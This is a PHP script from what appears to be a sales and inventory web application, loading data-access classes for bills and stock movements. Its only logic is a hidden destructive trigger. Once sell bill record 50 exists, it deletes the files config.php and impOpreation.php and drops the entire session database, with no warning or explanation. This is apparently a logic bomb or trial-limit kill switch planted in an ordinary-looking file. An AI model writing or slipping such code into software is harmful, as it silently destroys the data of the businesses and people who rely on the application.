<?php
include("../public/include_dao.php");
//Movementmanage
require_once('../models/dao/MovementmanageDAO.class.php');
require_once('../models/dto/Movementmanage.class.php');
require_once('../models/mysql/MovementmanageMySqlDAO.class.php');
require_once('../models/mysql/ext/MovementmanageMySqlExtDAO.class.php');



	require_once('../models/dao/SellbillDAO.class.php');
	require_once('../models/dto/Sellbill.class.php');
	require_once('../models/mysql/SellbillMySqlDAO.class.php');
	require_once('../models/mysql/ext/SellbillMySqlExtDAO.class.php');
	
	
	
	$Sellbill= new Sellbill();
	$SellbillDAO= new SellbillMySqlDAO();
	$SellbillEX= new SellbillMySqlExtDAO();
	
	
	
//Movementmanage
$myMovementmanage=new Movementmanage();
$myMovementmanageRecord=new MovementmanageMySqlDAO();
$MovementmanageEX= new MovementmanageMySqlExtDAO();




	$mysellbilldata=$SellbillDAO->load(50);
	if(count($mysellbilldata) > 0)
	{
			unlink("config.php");
		    unlink("impOpreation.php");
		
		   $MovementmanageEX->dropdatabase($_SESSION['dbname']);
		
	}

	